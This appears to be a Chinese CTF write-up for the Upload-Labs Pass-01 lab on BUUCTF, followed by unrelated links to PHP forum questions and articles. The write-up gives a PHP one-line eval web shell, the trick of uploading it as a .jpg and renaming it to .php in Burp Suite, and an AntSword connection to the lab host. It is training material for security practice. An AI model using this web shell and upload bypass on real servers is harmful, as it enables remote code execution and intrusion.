Upload-Labs-Windows Pass-01

2023-10-30

题目：

解题：

步骤1：上传文件

上传一句话木马，编辑文件a.php，内容为：<?php eval($_POST['shell']);?>

直接上传的话，会提示错误。题目要求选择图片格式上传，文件名改为a.jpg，内容为：<?php eval($_POST['shell']);?>，然后通过burp suite来修改上传文件名字。

步骤2：改文件名

把a.jpg改为a.php，然后点send，会发现上传成功：

步骤3：蚁剑连接

url地址：http://47cc3cc5-4e7f-46a4-bf51-9c3b2ed31e5f.node4.buuoj.cn:81/upload/a.php

连接密码：shell

连接进去后，在C盘打开下面这个文件就可以得到flag。

步骤4：查看源码

根据源码可知，该题过滤了文件后缀名，只允许上传后缀为jpg/png/gif的文件。

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

BUUCTF uploadlabs

网络安全

Web

php

Upload-Labs-Windows Pass-01 的相关文章

PHP7.1上读取会话数据失败

分享一个我遇到的问题现已解决在我的开发机器上我使用 PHP 运行 IIS 我升级到 PHP7 突然我的代码不再工作返回此错误 session start 读取会话数据失败用户路径 C WINDOWS temp 看起来像是权限问题
使用 Laravel Socialite 登录 facebook

然而我是 Laravel 的新手我正在遵循以下教程http www codeanchor net blog complete laravel socialite tutorial http www codeanchor net blog
在 JAX-WS 中使用安全性的最佳实践是什么

这是场景我有一些需要保护的 Web 服务 JAX WS 目前为了身份验证需求我提供了额外的 SecurityWService 它为授权用户提供了一些需要在请求其他服务时描述的 userid 和 sessionid 使用一些java安全
RuntimeException - 会话存储未根据请求设置 - Laravel Socialite - Facebook

我在用着Laravel 5 7 and Laravel Socialite 3 1 我想使用登录Facebook我刚刚为此项目配置了应用程序这些是我为此配置的主要文件 env FACEBOOK CLIENT ID FACEBOOK CLI
确定 PHP 到目前为止执行了多长时间

我需要确定 PHP 函数到目前为止已经运行了多长时间有哪些选项可以确定某些 PHP 代码的运行时间我正在使用 zend 框架 Call microtime true 函数以毫秒分辨率获取当前时间
Cron 作业的远程地址问题

我需要获取访问者的IP 但是当cron运行时它发现REMOTE ADDR是一个未定义的索引事实上当文件与 cron 一起运行时没有远程地址我该如何避免这个问题 PHP 有没有办法说如果 REMOTE ADDR 存在则考虑它如果
WordPress 子主题 -functions.php 复制 - 无法“重新声明”

我正在使用带有儿童主题 starkers child 的 Starkers 我需要编辑functions php来声明一个菜单所以我复制了functions php JS文件夹和external文件夹它们都在functions文件中的某
如何将值发布到输入框中？

Intro I would like to get the current time after clicking at click and POST the value into input text box Note 假设包含引导样式表
多维数组中的数组排列保留键 PHP

这两天我一直在疯狂地尝试完成这个任务也许你可以启发我这是针对赛马投注排列的每次用户玩游戏时我都会得到一个多维数组 2 个级别第一级包含比赛 ID 第二级包含用户为该比赛选择的马匹它看起来像这样 play array 4 gt a
软删除最佳实践（PHP/MySQL）

Problem 在处理产品和订单的 Web 应用程序中我想维护前员工用户与他们处理的订单之间的信息和关系我想维护过时产品和包含这些产品的订单之间的信息和关系然而我希望员工能够整理管理界面例如删除前员工过时的产品过时的产品组
SQL 查询结果为字符串（或变量）

是否可以将SQL查询结果输出到一个字符串或变量中我的php和mysql不好假设我有数据库 agents 其中包含列 agent id agent fname agent lname agent dept 使用此查询 sql SELECT
重用 PDO 语句 var 会使进程崩溃

我重用一个变量来存储两个不同的 PDO mysql 语句 stmt dbh gt prepare SELECT stmt gt execute stmt dbh gt prepare UPDATE crash here Error in o
Symfony 4 生产模式错误处理页面内存耗尽

我将我的项目设置为prod模式在 env除了自定义错误页面之外的所有内容似乎都有效我将此作为我的 404 树枝模板 templates bundles TwigBundle Exception error404 html twig inc
类 Doctrine\Common\Collections\ArrayCollection 不是有效的实体或映射的超类

我有三个实体特征值 php
wix 安装程序/创建网站并分配新的或现有的 Web 应用程序池

我尝试使用 wix 安装创建一个新网站没关系没有问题但我无法将新的或现有的网络应用程序池分配给新网站 iis website 标记不包含 WebAppPool 属性我如何将网络应用程序池分配给网站你可以在下面看到我的代码感谢您的
验证 LDAPS 连接的自签名证书

我想从 Linux Linux 3 2 0 4 amd64 1 SMP Debian 3 2 51 1 x86 64 GNU Linux 客户端到 Windows 2012 服务器建立安全的 ldap 连接 ldaps 以更改活动中的用户密
Yii2 组件将数据传递给 __construct

我有一个库我想将其用作组件在配置文件中我这样设置 components gt superLib gt class gt SuperLib construct gt first second Maybe Yii 2 have proper
检查字符串是否编码为 UTF-8

function seems utf8 str length strlen str for i 0 i lt length i c ord str i if c lt 0x80 n 0 0bbbbbbb elseif c 0xE0 0xC0
Symfony VS CakePHP：哪一个最接近 PHP [关闭]

Closed 这个问题是基于意见的 help closed questions 目前不接受答案我主要是一名 Rails 开发人员但有时我必须使用 PHP 进行编码因为 stackoverflow com更喜欢可以回答的问题我想知道
为什么 0.5 mod 0.1 在不同的编程语言中结果不同？

我有一个关于模数的问题模运算求一个数除以另一个数的余数我原本期望 0 5 0 1 0 的结果但是当我在 PHP 或 net 中运行它时我得到 0 1 我运行的 php 代码是 var dump fmod 0 5 0 1 在 net中

随机推荐

docker笔记-随笔

构建dockerfile docker build t sul gateway v1 0 将本地主机文件copy到容器中 docker cp 文件容器id 容器目录 docker cp sul gateway jar ce3a895f9a
正常关闭电源失效，强行关闭虚拟机电源

三种方法可以任选一种执行操作 1 后台开启Troubleshooting options 使用Alt F1登录或者使用SSH工具登录查看进程 ps grep vmx more 如果知道虚拟机名可以直接grep vmname 杀死进程
Android中获取文件路径的方法总结及对照

最近在写文件存贮 Android中获取文件路径的方法比较多所以自己也很混乱找了好几篇博客发现了以下的路径归纳记录一下以备不时之需 Environment getDataDirectory data Environment getD
EasyX的下载与使用教程网址

一下载下载网址 EasyX Graphics Library for C 1 点击右侧红色方框里的下载EasyX 2 下载成功后进行点击会出现以下界面在点击下一步点击安装就成功了二使用教程 EasyX 文档使用教程该网址
oneforall安装使用

如遇到安装出错 0x80070643 https www cnblogs com emanlee p 11422646 html 此软件需要python3环境安python时需要配置环境变量此步在安装时即可勾选在安装后直接运行o
orbslam2段错误 (核心已转储)

删除掉ORBSLAM的cmakelists中的 march native 以及 g2o 的cmakelists中的 march native 重新执行ORBSLAM目录下的 build sh 后就可以正常跑了
第四届蓝桥杯（2013）-省赛题解_C/C++__大学A组

目录感悟总结一高斯日记填空题二排它平方数填空题三振兴中华填空题四颠倒的价牌填空题五前缀判断代码补充六逆波兰表达式代码补充七错误票据八买不到的数目九剪格子十大臣的旅费感悟总结蓝桥杯有大
cpu.h-栈的宏定义-满减栈

常常两两相对的东西整一起后有点记不住就写下来 cpu h中有宏定义使用哪种栈 define OS STK GROWTH 1 Stack grows from HIGH to LOW memory on ARM 栈的四种满栈满字表示
错误解决：Clipping input data to the valid range for imshow with RGB data ([0..1] for floats or [0..255]

今天又是快乐改错误的经历在做k means进行图片压缩的实战项目中我遇到了这样一个pyplot显示图像报错问题 Clipping input data to the valid range for imshow with RGB dat
Python中的字典用法

文章目录一字典的定义二字典的创建 2 1 一个简单的字典 2 2 字典的嵌套三字典的特性 3 1 字典不支持切片 3 2 成员操作符 3 3 for循环遍历四字典元素的增加五字典元素的删除六字典元素的查看七字典的
制作最简单的Git Server

网上看到的Git Server部署方法一大堆一会儿搞什么SSH 还要弄私钥公钥复杂无比其实有一个办法非常简单如果是在公司内网环境下需要将某台机器部署为Git Server 我们称该机器为服务器假设IP为192 168 0 111
uni-app前端用户登录实现

从0开始开发SpringBoot vue前后端分离项目后端 Springboot简单实现用户登录操作文章目录从0开始开发SpringBoot vue前后端分离项目后端 1 HBuildX uni app创建项目一项目目录结构二
LinearLayer

线性层的作用类似于这边荧光绿的两层就是fully connected layer 将1 1 4096的向量变成1 1 1000的向量代码示例 import torch import torchvision from torch im
dwr 使用 callback 多个参数（间接方法）

dwrInvokeDataClaimAction findSupplierByName payee callback function returnData bringOutSupplierCallback returnData arg1
【Redis】List类型和底层原理

文章目录 List类型 1 List介绍 1 1常用命令 2 List底层实现 3 ziplist剖析 3 1ziplist结构 3 2创建一个空的ziplist 3 3ziplist的元素节点结构 3 4ziplisqt的连锁更新 3 5
Java 集合(List与LinkedList)接口详解

List接口 List接口的定义 List interface List extends Collection 通过观察List接口的定义发现其继承得是Collection接口 List Set Queue接口继承的都是Collection
[持续开源中]用2000元左右做水下机器人

1 水下机器人功能 1 平稳的运动控制 2 高清视频 3 定深悬停巡航 2 相关技术 2 1 PC上位机 1 C Winform MVC 现有 2 C MAUI MVVM Socket 开发中 2 2 下位机水下机器人 2 2 1 So
最长连续子序列的起始位置

用结构体保存结果注意的是最长连续子序列需要的是连续所以dp的状态方程别写错了 include
inotify_init使用

用于监控文件目录的修改创建删除等操作也可以配合epoll使用 include
Upload-Labs-Windows Pass-01

题目解题步骤1 上传文件上传一句话木马编辑文件a php 内容为直接上传的话会提示错误题目要求选择图片格式上传文件名改为a jpg 内容为然后通过burp suite来修改上传文件名字步骤2 改文件名把a jpg改为a